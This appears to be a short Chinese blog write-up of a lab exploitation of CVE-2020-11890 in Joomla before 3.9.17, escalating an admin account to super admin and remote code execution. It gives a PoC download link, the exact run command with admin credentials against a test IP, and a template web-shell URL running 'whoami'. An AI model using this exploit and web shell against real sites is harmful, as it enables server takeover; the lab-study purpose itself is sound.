CVE-2020-11890 简单利用

华盟原创文章投稿奖励计划

Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。占有全球6%的网站市场份额,使用PHP语言加上MySQL数据库所开发的软件系统。可以在Linux、 Windows、MacOSX等各种不同的平台上执行。Joomla!2.5.0版本至3.9.16版本中存在输入验证错误漏洞攻击者可利用该漏洞绕过ACL保护。

CVE-2020-11890 简单利用

影响版本


Joomla < 3.9.17


漏洞介绍


受影响的版本:

3.9.17之前的Joomla核心


用户要求:

管理员帐户(非超级管理员)


获得访问权限:

创建一个新的超级管理员,然后触发RCE。


测试环境


vulfocus一键启动docker环境

CVE-2020-11890 简单利用


漏洞利用


下载poc:


https://github.com/HoangKien1020/CVE-2020-11890/

CVE-2020-11890 简单利用


运行命令


python CVE-2020-11890.py -url http://188.40.189.135:10159/ -u admin -p admin

CVE-2020-11890 简单利用


查看当前用户:


[backcolor=rgba(255, 255, 255, 0.7)]http://188.40.189.135:10159//templates/protostar/error.php?cmd=whoami

CVE-2020-11890 简单利用


利用成功,可以返回当前用户为www-data用户

注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。

www.idc126.com

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/260856.html

发表评论